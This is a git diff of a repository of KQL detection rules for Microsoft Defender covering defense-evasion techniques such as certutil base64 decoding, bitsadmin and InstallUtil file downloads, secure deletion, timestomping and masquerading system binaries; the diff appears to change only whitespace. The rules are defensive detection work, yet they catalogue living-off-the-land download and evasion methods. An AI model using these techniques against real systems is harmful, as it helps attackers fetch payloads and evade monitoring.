Evasion/file_decoded_from_base64_hex_via_certutil_exe.kql @@ -1,10 +1,10 @@ -// Title: File Decoded From Base64/Hex Via Certutil.EXE -// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community -// Date: 2023-02-15 -// Level: high -// Description: Detects the execution of certutil with either the "decode" or "decodehex" flags to decode base64 or hex encoded files. This can be abused by attackers to decode an encoded payload before execution -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1027 - -DeviceProcessEvents +// Title: File Decoded From Base64/Hex Via Certutil.EXE +// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community +// Date: 2023-02-15 +// Level: high +// Description: Detects the execution of certutil with either the "decode" or "decodehex" flags to decode base64 or hex encoded files. This can be abused by attackers to decode an encoded payload before execution +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1027 + +DeviceProcessEvents | where (ProcessCommandLine contains "-decode " or ProcessCommandLine contains "/decode " or ProcessCommandLine contains "–decode " or ProcessCommandLine contains "—decode " or ProcessCommandLine contains "―decode " or ProcessCommandLine contains "-decodehex " or ProcessCommandLine contains "/decodehex " or ProcessCommandLine contains "–decodehex " or ProcessCommandLine contains "—decodehex " or ProcessCommandLine contains "―decodehex ") and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/file_deleted_via_sysinternals_sdelete.kql b/KQL/rules/Defense Evasion/file_deleted_via_sysinternals_sdelete.kql index 93d5dc05..5e684206 100644 --- a/KQL/rules/Defense Evasion/file_deleted_via_sysinternals_sdelete.kql +++ b/KQL/rules/Defense Evasion/file_deleted_via_sysinternals_sdelete.kql @@ -1,12 +1,12 @@ -// Title: File Deleted Via Sysinternals SDelete -// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) -// Date: 2020-05-02 -// Level: medium -// Description: Detects the deletion of files by the Sysinternals SDelete utility. It looks for the common name pattern used to rename files. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1070.004 -// False Positives: -// - Legitimate usage - -DeviceFileEvents +// Title: File Deleted Via Sysinternals SDelete +// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) +// Date: 2020-05-02 +// Level: medium +// Description: Detects the deletion of files by the Sysinternals SDelete utility. It looks for the common name pattern used to rename files. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1070.004 +// False Positives: +// - Legitimate usage + +DeviceFileEvents | where (FolderPath endswith ".AAA" or FolderPath endswith ".ZZZ") and (not(FolderPath endswith "\\Wireshark\\radius\\dictionary.alcatel-lucent.aaa")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/file_deletion.kql b/KQL/rules/Defense Evasion/file_deletion.kql index e0470dc3..8bd86d21 100644 --- a/KQL/rules/Defense Evasion/file_deletion.kql +++ b/KQL/rules/Defense Evasion/file_deletion.kql @@ -1,12 +1,12 @@ -// Title: File Deletion -// Author: Ömer Günal, oscd.community -// Date: 2020-10-07 -// Level: informational -// Description: Detects file deletion using "rm", "shred" or "unlink" commands which are used often by adversaries to delete files left behind by the actions of their intrusion activity -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1070.004 -// False Positives: -// - Legitimate administration activities - -DeviceProcessEvents +// Title: File Deletion +// Author: Ömer Günal, oscd.community +// Date: 2020-10-07 +// Level: informational +// Description: Detects file deletion using "rm", "shred" or "unlink" commands which are used often by adversaries to delete files left behind by the actions of their intrusion activity +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1070.004 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents | where FolderPath endswith "/rm" or FolderPath endswith "/shred" or FolderPath endswith "/unlink" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/file_deletion_via_del.kql b/KQL/rules/Defense Evasion/file_deletion_via_del.kql index 10fa132c..69bf76f7 100644 --- a/KQL/rules/Defense Evasion/file_deletion_via_del.kql +++ b/KQL/rules/Defense Evasion/file_deletion_via_del.kql @@ -1,15 +1,15 @@ -// Title: File Deletion Via Del -// Author: frack113 -// Date: 2022-01-15 -// Level: low -// Description: Detects execution of the builtin "del"/"erase" commands in order to delete files. -// Adversaries may delete files left behind by the actions of their intrusion activity. -// Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. -// Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1070.004 -// False Positives: -// - False positives levels will differ Depending on the environment. You can use a combination of ParentImage and other keywords from the CommandLine field to filter legitimate activity - -DeviceProcessEvents +// Title: File Deletion Via Del +// Author: frack113 +// Date: 2022-01-15 +// Level: low +// Description: Detects execution of the builtin "del"/"erase" commands in order to delete files. +// Adversaries may delete files left behind by the actions of their intrusion activity. +// Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. +// Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1070.004 +// False Positives: +// - False positives levels will differ Depending on the environment. You can use a combination of ParentImage and other keywords from the CommandLine field to filter legitimate activity + +DeviceProcessEvents | where (ProcessCommandLine contains "del " or ProcessCommandLine contains "erase ") and (ProcessCommandLine contains " -f" or ProcessCommandLine contains " /f" or ProcessCommandLine contains " –f" or ProcessCommandLine contains " —f" or ProcessCommandLine contains " ―f" or ProcessCommandLine contains " -s" or ProcessCommandLine contains " /s" or ProcessCommandLine contains " –s" or ProcessCommandLine contains " —s" or ProcessCommandLine contains " ―s" or ProcessCommandLine contains " -q" or ProcessCommandLine contains " /q" or ProcessCommandLine contains " –q" or ProcessCommandLine contains " —q" or ProcessCommandLine contains " ―q") and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/file_download_using_protocolhandler_exe.kql b/KQL/rules/Defense Evasion/file_download_using_protocolhandler_exe.kql index 88c5dd72..bfa9c152 100644 --- a/KQL/rules/Defense Evasion/file_download_using_protocolhandler_exe.kql +++ b/KQL/rules/Defense Evasion/file_download_using_protocolhandler_exe.kql @@ -1,10 +1,10 @@ -// Title: File Download Using ProtocolHandler.exe -// Author: frack113 -// Date: 2021-07-13 -// Level: medium -// Description: Detects usage of "ProtocolHandler" to download files. Downloaded files will be located in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE) -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218 - -DeviceProcessEvents +// Title: File Download Using ProtocolHandler.exe +// Author: frack113 +// Date: 2021-07-13 +// Level: medium +// Description: Detects usage of "ProtocolHandler" to download files. Downloaded files will be located in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 + +DeviceProcessEvents | where (ProcessCommandLine contains "ftp://" or ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and (FolderPath endswith "\\protocolhandler.exe" or ProcessVersionInfoOriginalFileName =~ "ProtocolHandler.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/file_download_via_bitsadmin.kql b/KQL/rules/Defense Evasion/file_download_via_bitsadmin.kql index 60f2f41e..f4f2a035 100644 --- a/KQL/rules/Defense Evasion/file_download_via_bitsadmin.kql +++ b/KQL/rules/Defense Evasion/file_download_via_bitsadmin.kql @@ -1,12 +1,12 @@ -// Title: File Download Via Bitsadmin -// Author: Michael Haag, FPT.EagleEye -// Date: 2017-03-09 -// Level: medium -// Description: Detects usage of bitsadmin downloading a file -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003 -// False Positives: -// - Some legitimate apps use this, but limited. - -DeviceProcessEvents +// Title: File Download Via Bitsadmin +// Author: Michael Haag, FPT.EagleEye +// Date: 2017-03-09 +// Level: medium +// Description: Detects usage of bitsadmin downloading a file +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003 +// False Positives: +// - Some legitimate apps use this, but limited. + +DeviceProcessEvents | where (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe") and (ProcessCommandLine contains " /transfer " or ((ProcessCommandLine contains " /create " or ProcessCommandLine contains " /addfile ") and ProcessCommandLine contains "http")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/file_download_via_bitsadmin_to_a_suspicious_target_folder.kql b/KQL/rules/Defense Evasion/file_download_via_bitsadmin_to_a_suspicious_target_folder.kql index 6d1a44f6..f2966d71 100644 --- a/KQL/rules/Defense Evasion/file_download_via_bitsadmin_to_a_suspicious_target_folder.kql +++ b/KQL/rules/Defense Evasion/file_download_via_bitsadmin_to_a_suspicious_target_folder.kql @@ -1,10 +1,10 @@ -// Title: File Download Via Bitsadmin To A Suspicious Target Folder -// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-06-28 -// Level: high -// Description: Detects usage of bitsadmin downloading a file to a suspicious target folder -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003 - -DeviceProcessEvents +// Title: File Download Via Bitsadmin To A Suspicious Target Folder +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-06-28 +// Level: high +// Description: Detects usage of bitsadmin downloading a file to a suspicious target folder +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003 + +DeviceProcessEvents | where (ProcessCommandLine contains " /transfer " or ProcessCommandLine contains " /create " or ProcessCommandLine contains " /addfile ") and (ProcessCommandLine contains ":\\Perflogs" or ProcessCommandLine contains ":\\ProgramData\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\AppData\\Roaming\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "%ProgramData%" or ProcessCommandLine contains "%public%") and (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/file_download_via_bitsadmin_to_an_uncommon_target_folder.kql b/KQL/rules/Defense Evasion/file_download_via_bitsadmin_to_an_uncommon_target_folder.kql index 4892bb28..dc75d930 100644 --- a/KQL/rules/Defense Evasion/file_download_via_bitsadmin_to_an_uncommon_target_folder.kql +++ b/KQL/rules/Defense Evasion/file_download_via_bitsadmin_to_an_uncommon_target_folder.kql @@ -1,10 +1,10 @@ -// Title: File Download Via Bitsadmin To An Uncommon Target Folder -// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-06-28 -// Level: medium -// Description: Detects usage of bitsadmin downloading a file to uncommon target folder -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003 - -DeviceProcessEvents +// Title: File Download Via Bitsadmin To An Uncommon Target Folder +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-06-28 +// Level: medium +// Description: Detects usage of bitsadmin downloading a file to uncommon target folder +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003 + +DeviceProcessEvents | where (ProcessCommandLine contains " /transfer " or ProcessCommandLine contains " /create " or ProcessCommandLine contains " /addfile ") and (ProcessCommandLine contains "%AppData%" or ProcessCommandLine contains "%temp%" or ProcessCommandLine contains "%tmp%" or ProcessCommandLine contains "\\AppData\\Local\\" or ProcessCommandLine contains "C:\\Windows\\Temp\\") and (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/file_download_via_installutil_exe.kql b/KQL/rules/Defense Evasion/file_download_via_installutil_exe.kql index d1b3a747..e1383f7d 100644 --- a/KQL/rules/Defense Evasion/file_download_via_installutil_exe.kql +++ b/KQL/rules/Defense Evasion/file_download_via_installutil_exe.kql @@ -1,10 +1,10 @@ -// Title: File Download Via InstallUtil.EXE -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-08-19 -// Level: medium -// Description: Detects use of .NET InstallUtil.exe in order to download arbitrary files. The files will be written to "%LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\" -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218 - -DeviceProcessEvents +// Title: File Download Via InstallUtil.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-19 +// Level: medium +// Description: Detects use of .NET InstallUtil.exe in order to download arbitrary files. The files will be written to "%LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\" +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 + +DeviceProcessEvents | where (ProcessCommandLine contains "ftp://" or ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and (FolderPath endswith "\\InstallUtil.exe" or ProcessVersionInfoOriginalFileName =~ "InstallUtil.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/file_download_via_nscurl_macos.kql b/KQL/rules/Defense Evasion/file_download_via_nscurl_macos.kql index 97cd556e..18b4e268 100644 --- a/KQL/rules/Defense Evasion/file_download_via_nscurl_macos.kql +++ b/KQL/rules/Defense Evasion/file_download_via_nscurl_macos.kql @@ -1,12 +1,12 @@ -// Title: File Download Via Nscurl - MacOS -// Author: Daniel Cortez -// Date: 2024-06-04 -// Level: medium -// Description: Detects the execution of the nscurl utility in order to download files. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.command-and-control, attack.t1105 -// False Positives: -// - Legitimate usage of nscurl by administrators and users. - -DeviceProcessEvents +// Title: File Download Via Nscurl - MacOS +// Author: Daniel Cortez +// Date: 2024-06-04 +// Level: medium +// Description: Detects the execution of the nscurl utility in order to download files. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.command-and-control, attack.t1105 +// False Positives: +// - Legitimate usage of nscurl by administrators and users. + +DeviceProcessEvents | where (ProcessCommandLine contains "--download " or ProcessCommandLine contains "--download-directory " or ProcessCommandLine contains "--output " or ProcessCommandLine contains "-dir " or ProcessCommandLine contains "-dl " or ProcessCommandLine contains "-ld" or ProcessCommandLine contains "-o ") and FolderPath endswith "/nscurl" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/file_download_via_windows_defender_mpcmprun_exe.kql b/KQL/rules/Defense Evasion/file_download_via_windows_defender_mpcmprun_exe.kql index 06cccb70..a7430eb1 100644 --- a/KQL/rules/Defense Evasion/file_download_via_windows_defender_mpcmprun_exe.kql +++ b/KQL/rules/Defense Evasion/file_download_via_windows_defender_mpcmprun_exe.kql @@ -1,10 +1,10 @@ -// Title: File Download Via Windows Defender MpCmpRun.EXE -// Author: Matthew Matchen -// Date: 2020-09-04 -// Level: high -// Description: Detects the use of Windows Defender MpCmdRun.EXE to download files -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218, attack.command-and-control, attack.t1105 - -DeviceProcessEvents +// Title: File Download Via Windows Defender MpCmpRun.EXE +// Author: Matthew Matchen +// Date: 2020-09-04 +// Level: high +// Description: Detects the use of Windows Defender MpCmdRun.EXE to download files +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218, attack.command-and-control, attack.t1105 + +DeviceProcessEvents | where (ProcessCommandLine contains "DownloadFile" and ProcessCommandLine contains "url") and (ProcessVersionInfoOriginalFileName =~ "MpCmdRun.exe" or FolderPath endswith "\\MpCmdRun.exe" or ProcessCommandLine contains "MpCmdRun.exe" or ProcessVersionInfoFileDescription =~ "Microsoft Malware Protection Command Line Utility") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/file_download_with_headless_browser.kql b/KQL/rules/Defense Evasion/file_download_with_headless_browser.kql index 4b5e1ef3..fc899b61 100644 --- a/KQL/rules/Defense Evasion/file_download_with_headless_browser.kql +++ b/KQL/rules/Defense Evasion/file_download_with_headless_browser.kql @@ -1,10 +1,10 @@ -// Title: File Download with Headless Browser -// Author: Sreeman, Florian Roth (Nextron Systems) -// Date: 2022-01-04 -// Level: high -// Description: Detects execution of chromium based browser in headless mode using the "dump-dom" command line to download files -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.command-and-control, attack.t1105, attack.t1564.003 - -DeviceProcessEvents +// Title: File Download with Headless Browser +// Author: Sreeman, Florian Roth (Nextron Systems) +// Date: 2022-01-04 +// Level: high +// Description: Detects execution of chromium based browser in headless mode using the "dump-dom" command line to download files +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.command-and-control, attack.t1105, attack.t1564.003 + +DeviceProcessEvents | where ((ProcessCommandLine contains "--headless" and ProcessCommandLine contains "dump-dom" and ProcessCommandLine contains "http") and (FolderPath endswith "\\brave.exe" or FolderPath endswith "\\chrome.exe" or FolderPath endswith "\\msedge.exe" or FolderPath endswith "\\opera.exe" or FolderPath endswith "\\vivaldi.exe")) and (not(((ProcessCommandLine contains "--headless --disable-gpu --disable-extensions --disable-plugins --mute-audio --no-first-run --incognito --aggressive-cache-discard --dump-dom" and (FolderPath endswith "\\msedge.exe" or FolderPath endswith "\\msedgewebview2.exe" or FolderPath endswith "\\MicrosoftEdge.exe") and (FolderPath startswith "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\" or FolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeCore\\" or FolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\" or FolderPath startswith "C:\\Program Files\\Microsoft\\Edge\\Application\\" or FolderPath startswith "C:\\Program Files\\Microsoft\\EdgeCore\\" or FolderPath startswith "C:\\Program Files\\Microsoft\\EdgeWebView\\" or FolderPath startswith "C:\\Program Files\\WindowsApps\\Microsoft.MicrosoftEdge")) or (ProcessCommandLine contains "--headless --disable-gpu --disable-extensions --disable-plugins --mute-audio --no-first-run --incognito --aggressive-cache-discard --dump-dom" and (FolderPath contains "\\AppData\\Local\\Microsoft\\WindowsApps\\" or FolderPath contains "\\Windows\\SystemApps\\Microsoft.MicrosoftEdge") and (FolderPath endswith "\\msedge.exe" or FolderPath endswith "\\MicrosoftEdge.exe"))))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/file_encoded_to_base64_via_certutil_exe.kql b/KQL/rules/Defense Evasion/file_encoded_to_base64_via_certutil_exe.kql index 6671829f..a082c43e 100644 --- a/KQL/rules/Defense Evasion/file_encoded_to_base64_via_certutil_exe.kql +++ b/KQL/rules/Defense Evasion/file_encoded_to_base64_via_certutil_exe.kql @@ -1,12 +1,12 @@ -// Title: File Encoded To Base64 Via Certutil.EXE -// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems) -// Date: 2019-02-24 -// Level: medium -// Description: Detects the execution of certutil with the "encode" flag to encode a file to base64. This can be abused by threat actors and attackers for data exfiltration -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1027 -// False Positives: -// - As this is a general purpose rule, legitimate usage of the encode functionality will trigger some false positives. Apply additional filters accordingly - -DeviceProcessEvents +// Title: File Encoded To Base64 Via Certutil.EXE +// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems) +// Date: 2019-02-24 +// Level: medium +// Description: Detects the execution of certutil with the "encode" flag to encode a file to base64. This can be abused by threat actors and attackers for data exfiltration +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1027 +// False Positives: +// - As this is a general purpose rule, legitimate usage of the encode functionality will trigger some false positives. Apply additional filters accordingly + +DeviceProcessEvents | where (ProcessCommandLine contains "-encode" or ProcessCommandLine contains "/encode" or ProcessCommandLine contains "–encode" or ProcessCommandLine contains "—encode" or ProcessCommandLine contains "―encode") and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/file_in_suspicious_location_encoded_to_base64_via_certutil_exe.kql b/KQL/rules/Defense Evasion/file_in_suspicious_location_encoded_to_base64_via_certutil_exe.kql index 5b328441..11db1924 100644 --- a/KQL/rules/Defense Evasion/file_in_suspicious_location_encoded_to_base64_via_certutil_exe.kql +++ b/KQL/rules/Defense Evasion/file_in_suspicious_location_encoded_to_base64_via_certutil_exe.kql @@ -1,10 +1,10 @@ -// Title: File In Suspicious Location Encoded To Base64 Via Certutil.EXE -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-05-15 -// Level: high -// Description: Detects the execution of certutil with the "encode" flag to encode a file to base64 where the files are located in potentially suspicious locations -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1027 - -DeviceProcessEvents +// Title: File In Suspicious Location Encoded To Base64 Via Certutil.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-15 +// Level: high +// Description: Detects the execution of certutil with the "encode" flag to encode a file to base64 where the files are located in potentially suspicious locations +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1027 + +DeviceProcessEvents | where (ProcessCommandLine contains "-encode" or ProcessCommandLine contains "/encode" or ProcessCommandLine contains "–encode" or ProcessCommandLine contains "—encode" or ProcessCommandLine contains "―encode") and (ProcessCommandLine contains "\\AppData\\Roaming\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "\\Local\\Temp\\" or ProcessCommandLine contains "\\PerfLogs\\" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\Windows\\Temp\\" or ProcessCommandLine contains "$Recycle.Bin") and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/file_time_attribute_change.kql b/KQL/rules/Defense Evasion/file_time_attribute_change.kql index 82cf7ee8..e51178de 100644 --- a/KQL/rules/Defense Evasion/file_time_attribute_change.kql +++ b/KQL/rules/Defense Evasion/file_time_attribute_change.kql @@ -1,10 +1,10 @@ -// Title: File Time Attribute Change -// Author: Igor Fits, Mikhail Larin, oscd.community -// Date: 2020-10-19 -// Level: medium -// Description: Detect file time attribute change to hide new or changes to existing files -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1070.006 - -DeviceProcessEvents +// Title: File Time Attribute Change +// Author: Igor Fits, Mikhail Larin, oscd.community +// Date: 2020-10-19 +// Level: medium +// Description: Detect file time attribute change to hide new or changes to existing files +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1070.006 + +DeviceProcessEvents | where (ProcessCommandLine contains "-t" or ProcessCommandLine contains "-acmr" or ProcessCommandLine contains "-d" or ProcessCommandLine contains "-r") and FolderPath endswith "/touch" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/file_with_suspicious_extension_downloaded_via_bitsadmin.kql b/KQL/rules/Defense Evasion/file_with_suspicious_extension_downloaded_via_bitsadmin.kql index 33c61809..4ffd38e6 100644 --- a/KQL/rules/Defense Evasion/file_with_suspicious_extension_downloaded_via_bitsadmin.kql +++ b/KQL/rules/Defense Evasion/file_with_suspicious_extension_downloaded_via_bitsadmin.kql @@ -1,10 +1,10 @@ -// Title: File With Suspicious Extension Downloaded Via Bitsadmin -// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-06-28 -// Level: high -// Description: Detects usage of bitsadmin downloading a file with a suspicious extension -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003 - -DeviceProcessEvents +// Title: File With Suspicious Extension Downloaded Via Bitsadmin +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-06-28 +// Level: high +// Description: Detects usage of bitsadmin downloading a file with a suspicious extension +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003 + +DeviceProcessEvents | where (ProcessCommandLine contains ".7z" or ProcessCommandLine contains ".asax" or ProcessCommandLine contains ".ashx" or ProcessCommandLine contains ".asmx" or ProcessCommandLine contains ".asp" or ProcessCommandLine contains ".aspx" or ProcessCommandLine contains ".bat" or ProcessCommandLine contains ".cfm" or ProcessCommandLine contains ".cgi" or ProcessCommandLine contains ".chm" or ProcessCommandLine contains ".cmd" or ProcessCommandLine contains ".dll" or ProcessCommandLine contains ".gif" or ProcessCommandLine contains ".jpeg" or ProcessCommandLine contains ".jpg" or ProcessCommandLine contains ".jsp" or ProcessCommandLine contains ".jspx" or ProcessCommandLine contains ".log" or ProcessCommandLine contains ".png" or ProcessCommandLine contains ".ps1" or ProcessCommandLine contains ".psm1" or ProcessCommandLine contains ".rar" or ProcessCommandLine contains ".scf" or ProcessCommandLine contains ".sct" or ProcessCommandLine contains ".txt" or ProcessCommandLine contains ".vbe" or ProcessCommandLine contains ".vbs" or ProcessCommandLine contains ".war" or ProcessCommandLine contains ".wsf" or ProcessCommandLine contains ".wsh" or ProcessCommandLine contains ".xll" or ProcessCommandLine contains ".zip") and (ProcessCommandLine contains " /transfer " or ProcessCommandLine contains " /create " or ProcessCommandLine contains " /addfile ") and (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/files_with_system_dll_name_in_unsuspected_locations.kql b/KQL/rules/Defense Evasion/files_with_system_dll_name_in_unsuspected_locations.kql index bf3cc154..cc19cbbc 100644 --- a/KQL/rules/Defense Evasion/files_with_system_dll_name_in_unsuspected_locations.kql +++ b/KQL/rules/Defense Evasion/files_with_system_dll_name_in_unsuspected_locations.kql @@ -1,13 +1,13 @@ -// Title: Files With System DLL Name In Unsuspected Locations -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2024-06-24 -// Level: medium -// Description: Detects the creation of a file with the ".dll" extension that has the name of a System DLL in uncommon or unsuspected locations. (Outisde of "System32", "SysWOW64", etc.). -// It is highly recommended to perform an initial baseline before using this rule in production. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1036.005 -// False Positives: -// - Third party software might bundle specific versions of system DLLs. - -DeviceFileEvents +// Title: Files With System DLL Name In Unsuspected Locations +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-06-24 +// Level: medium +// Description: Detects the creation of a file with the ".dll" extension that has the name of a System DLL in uncommon or unsuspected locations. (Outisde of "System32", "SysWOW64", etc.). +// It is highly recommended to perform an initial baseline before using this rule in production. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036.005 +// False Positives: +// - Third party software might bundle specific versions of system DLLs. + +DeviceFileEvents | where (FolderPath endswith "\\secur32.dll" or FolderPath endswith "\\tdh.dll") and (not((FolderPath contains "C:\\$WINDOWS.~BT\\" or FolderPath contains "C:\\$WinREAgent\\" or FolderPath contains "C:\\Windows\\SoftwareDistribution\\" or FolderPath contains "C:\\Windows\\System32\\" or FolderPath contains "C:\\Windows\\SysWOW64\\" or FolderPath contains "C:\\Windows\\WinSxS\\" or FolderPath contains "C:\\Windows\\uus\\"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/files_with_system_process_name_in_unsuspected_locations.kql b/KQL/rules/Defense Evasion/files_with_system_process_name_in_unsuspected_locations.kql index 19db18b1..90c132a2 100644 --- a/KQL/rules/Defense Evasion/files_with_system_process_name_in_unsuspected_locations.kql +++ b/KQL/rules/Defense Evasion/files_with_system_process_name_in_unsuspected_locations.kql @@ -1,14 +1,14 @@ -// Title: Files With System Process Name In Unsuspected Locations -// Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems) -// Date: 2020-05-26 -// Level: medium -// Description: Detects the creation of an executable with a system process name in folders other than the system ones (System32, SysWOW64, etc.). -// It is highly recommended to perform an initial baseline before using this rule in production. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1036.005 -// False Positives: -// - System processes copied outside their default folders for testing purposes -// - Third party software naming their software with the same names as the processes mentioned here - -DeviceFileEvents +// Title: Files With System Process Name In Unsuspected Locations +// Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems) +// Date: 2020-05-26 +// Level: medium +// Description: Detects the creation of an executable with a system process name in folders other than the system ones (System32, SysWOW64, etc.). +// It is highly recommended to perform an initial baseline before using this rule in production. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036.005 +// False Positives: +// - System processes copied outside their default folders for testing purposes +// - Third party software naming their software with the same names as the processes mentioned here + +DeviceFileEvents | where (FolderPath endswith "\\AtBroker.exe" or FolderPath endswith "\\audiodg.exe" or FolderPath endswith "\\backgroundTaskHost.exe" or FolderPath endswith "\\bcdedit.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\cmdl32.exe" or FolderPath endswith "\\cmstp.exe" or FolderPath endswith "\\conhost.exe" or FolderPath endswith "\\csrss.exe" or FolderPath endswith "\\dasHost.exe" or FolderPath endswith "\\dfrgui.exe" or FolderPath endswith 